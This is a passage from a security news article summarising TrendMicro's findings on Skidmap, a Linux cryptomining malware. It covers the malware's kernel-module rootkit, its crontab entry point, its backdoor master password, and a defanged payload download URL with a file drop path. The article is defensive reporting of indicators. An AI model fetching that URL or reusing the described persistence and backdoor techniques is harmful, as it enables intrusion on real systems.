Cybersecurity research firm TrendMicro has come across a new Linux malware. The malware — Skidmap — is capable of illicit cryptocurrency mining activities.
Skidmap is the new Linux malware in town
As per the research, the new Linux malware mines crypto by creating malicious loadable kernel modules (LKM) to stay under the wraps. As the malware utilizes Linux kernel module rootkits, it becomes difficult to detect and patch it. This is because of its overwriting and modification of kernel parts capabilities.
Apart from cryptocurrency mining, the new Linux malware can grant the attackers backdoor access to the affected system by creating a secret master password for unauthorized access on the part of anyone.
How does Skidmap malware work?
Skidmap Linux malware enters the system via crontab (commands to regularly schedule jobs in Unix-like computer OS). Once it gets through the victim system, it installs malicious binaries (“pc”), which eventually lowers down the security settings of the device to conduct the crypto mining.
However, there is no word on which cryptocurrency the malware mines.
To inject a system with a cryptocurrency miner, the malware figures out the system’s OS — if it is based on Debian or RHEL/CentOS.
Image: TrendMicro
For a Debian-based system, it infects the system by saving the crypto miner payload to “/tmp/miner2”. An RHEL/CentOS-based system gets its crypto miner payload and other components in the form of a tar file from the URL “hxxp://pm[.]ipfswallet[.]tk/cos7[.]tar[.]gz.”
In addition to this, the Linux malware devises another method of unauthoriz ..
Support the originator by clicking the read the rest link below.
